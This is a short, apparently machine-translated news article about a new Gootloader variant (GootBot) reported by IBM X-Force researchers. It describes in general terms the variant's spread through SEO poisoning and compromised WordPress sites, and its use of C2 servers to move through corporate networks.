Gootloader, new variant worries: even more difficult to detect

A new variant of the malware Gootloaderidentified in recent days, is worrying security experts.

The malicious agent in question, already cataloged in 2021 by Cybersecurity and Infrastructure Security Agency (CISA) of the United States as one of the main online threats, was already the protagonist of an intense campaign last summer. In the past, Gootloader was exploited as an initial access vector capable of spreading other infamous malware, such as Cobalt Strike, IcedID o SystemBC.

Yesterday, researchers from IBM X-Force However, they noticed anomalous behavior of this malicious agent. The same, although using infection techniques similar to those of previous versions, now seems to spread as a tool downloaded after an initial infection, capable of receiving commands from a remote server via Encrypted PowerShell.

Gootloader uses SEO Poisoning techniques and compromised WordPress sites to spread

Second Golo Mühr e Ole Villadsen of IBMThe Gootloader group’s introduction of its own custom bot late in the attack chain is an attempt to avoid detection when using standard C2 tools such as CobaltStrike or RDP“.

For the same experts “This new variant is a lightweight but effective malware that allows attackers to quickly spread throughout the network and distribute additional payloads“. As regards diffusion techniques, we mainly talk about SEO Poisoningwith compromised websites exploited to trick victims into downloading the payload which starts the infection.

Researchers quickly realized that Gootloader is difficult to block. Mühr and Villadsen clarified how “GootBot implants, each containing a different C2 server running on a compromised WordPress site, have spread in large numbers across infected corporate domains in hopes of reaching a domain controller“.

The use of techniques such as SEO Poisoning combined with sites WordPress compromises is nothing new for the group responsible for this malware. This collective, in fact, has been active since 2014 and has repeatedly exploited search engines in its infection strategies, as well as having also adopted ransomware during their criminal activities.


Please enter your comment!
Please enter your name here